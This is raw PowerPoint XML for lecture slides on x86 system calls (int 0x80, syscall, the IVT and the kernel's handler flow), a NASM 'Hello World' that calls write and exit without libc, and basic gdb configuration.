            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>But again, things are more complicated vs. intra-program control flow transfers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104534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 smtClean="0"/>
              <a:t>System Calls</a:t>
            </a:r>
            <a:endParaRPr sz="4500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="184" name="Table 184"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="484775" y="1620527"/>
          <a:ext cx="11251033" cy="5058831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08002"/>
                <a:gridCol w="4861044"/>
                <a:gridCol w="4781987"/>
              </a:tblGrid>
              <a:tr h="1260794"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Instruction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/>
                        <a:t>Condition</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1" dirty="0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/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill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253724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700" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t>int</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1700" dirty="0" smtClean="0">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t>x</a:t>
                      </a:r>
                      <a:endParaRPr sz="1700" dirty="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800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> ← </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> - 4
Mem(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>) ← </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Succ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>eip</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:sym typeface="Helvetica Light"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> ← </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> – 4</a:t>
                      </a:r>
                    </a:p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Mem(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>) ← </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>cs</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:sym typeface="Helvetica Light"/>
                      </a:endParaRPr>
                    </a:p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…</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>eflags</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> ← </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>eflags</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> &amp; DISABLE_PROTECTION_MASK</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>
</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>eip</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> ← </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Addr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>IVT[x]</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>)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Push </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> code segment, flags, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>, and stack segment onto the stack. Disable protected mode (by </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>modifing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> flags). Change </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>eip</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> to the address of the interrupt handler specified in the Interrupt Vector Table (IVT)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  <a:tr h="126079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700" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t>syscall</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t>sysenter</a:t>
                      </a:r>
                      <a:endParaRPr sz="1700" dirty="0">
                        <a:latin typeface="Menlo"/>
                        <a:ea typeface="Menlo"/>
                        <a:cs typeface="Menlo"/>
                        <a:sym typeface="Menlo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…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lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Similar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> to int. Pushes key registers, disables protection, changes </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>eip</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> to the address of the system call handler specified by the OS in the GDT.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" dirty="0">
                        <a:sym typeface="Helvetica Light"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719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8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35"/>
            <a:ext cx="8229600" cy="849153"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System Call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57121" y="1997261"/>
            <a:ext cx="1627221" cy="4253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857122" y="5838451"/>
            <a:ext cx="1627221" cy="417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IVT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5669" y="1509758"/>
            <a:ext cx="1708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Main Memory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57119" y="1997261"/>
            <a:ext cx="1627221" cy="2040634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8856657" y="3146809"/>
            <a:ext cx="1627682" cy="33946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0x80 Handler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56658" y="4918318"/>
            <a:ext cx="1627221" cy="71845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User Program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580025" y="907999"/>
            <a:ext cx="7092920" cy="60248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Software executes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0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pushes EIP, CS, and EFLAGS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CPU transfers execution to the OS handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look up the handler in the IVT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Switch from ring 3 to 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executes the system call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Save the processes state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use EAX to locate the system call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute the system call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Restore the processes state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Put the return value in EAX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Return to the process with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iret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914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pops EIP, CS, and EFLAGS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Switches from ring 0 to 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56196" y="3578392"/>
            <a:ext cx="1627682" cy="33946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Syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Table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56196" y="2693483"/>
            <a:ext cx="1627682" cy="33946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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>()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02379" y="2025584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OS Code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8077200" y="4757472"/>
            <a:ext cx="805892" cy="724823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EIP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8955578" y="5896495"/>
            <a:ext cx="1413164" cy="3048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945590" y="3593602"/>
            <a:ext cx="1445320" cy="3048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0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3.88889E-6 -0.2632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2632 L -3.88889E-6 -0.33357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33357 L -3.88889E-6 -0.26319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2632 L -3.88889E-6 -7.40741E-7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9" grpId="0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Invoking Syscalls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Shape 3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We can of course bypass libc and directly ask the kernel for services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Sometimes done in exploits to avoid defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Need to know the syscall number (index into kernel syscall table)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Methods differ by OS, architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Linux/x86_64 – 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syscall</a:t>
            </a:r>
            <a:endParaRPr sz="2250"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Linux/x86 –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int 0x80</a:t>
            </a:r>
            <a:endParaRPr sz="2250"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Let's write a program to print a message and exit cleanly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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56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213650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467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/>
              <a:t>Invoking </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" dirty="0" err="1"/>
              <a:t>Syscalls</a:t>
            </a:r>
            <a:endParaRPr sz="4500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="Shape 321"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1077902"/>
            <a:ext cx="10515600" cy="55469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bits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64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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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8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as before...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section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.text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global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_start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_start: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8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msg_len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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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8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len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 to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8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lang="en-US"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8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8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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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8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fd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1 (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stdout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 to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8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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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8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write is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syscall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1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syscall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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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8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call write(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8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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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8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status code 0 to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8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60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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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8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exit is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syscall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60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syscall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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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8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call exit(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8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int3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section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.data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 err="1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sz="18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b="1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db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lang="en-US" sz="18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Hello World</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0" smtClean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r>
              <a:rPr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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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0x0a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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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8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our message data</a:t>
            </a:r>
            <a:endParaRPr sz="18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79400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="212725" algn="l"/>
                <a:tab pos="1303338" algn="l"/>
                <a:tab pos="3203575" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0" err="1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msg_len</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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equ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$</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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r>
              <a:rPr sz="18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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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len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is $ (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cur_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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 - </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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msg</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0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126199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Invoking Syscalls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="Shape 3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&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" err="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"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-f elf64 -o </a:t>
            </a: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hello.o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 hello.asm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&gt; </a:t>
            </a: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ld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 -o hello </a:t>
            </a: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hello.o</a:t>
            </a:r>
            <a:endParaRPr sz="2250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&gt; ./hello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lang="en-US" sz="2250" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Hello World</a:t>
            </a:r>
            <a:endParaRPr sz="2250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&gt; echo $?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0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2250" dirty="0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You should see something similar to the above</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Notice we didn't need to link against </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>And, we don't need to invoke the runtime loader</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="161972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Debugging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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Sometimes your program (or exploit) is buggy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>An interactive debugger can be useful in that case</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Start, stop execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Set breakpoints, watchpoints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Directly inspect memory and CPU state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Modify program state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Let's look at debugging binary programs with gdb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>(Some differences from programs with source)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408143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Human-readable machine code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With a simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(usually 1-to-1) translation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to machine code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will focus on x86/x86_64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Externally) CISC architectures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instructions have side effects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assembly syntaxes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intel – &lt;mnemonic&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;, &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src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AT&amp;T – &lt;mnemonic&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;, &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dst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We will use Intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>syntax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Initializing gdb</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="Shape 33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84767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&gt; cat ~/.</a:t>
            </a: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gdbinit</a:t>
            </a:r>
            <a:endParaRPr sz="2250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set disassembly-flavor </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>intel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0" smtClean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lang="en-US" sz="2250" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>set follow-fork-mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>child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lang="en-US" sz="2250" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>detach-on-fork off</a:t>
            </a:r>
            <a:endParaRPr sz="2250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disp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/</a:t>
            </a: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i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 $rip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2250" dirty="0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Initial setup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Set default disassembly syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Display current instruction at each </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>step</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>Control how </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" err="1" smtClean="0"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t> deals with programs that fork()</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Also useful for setting breakpoints, scripting program execution to known interesting state, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
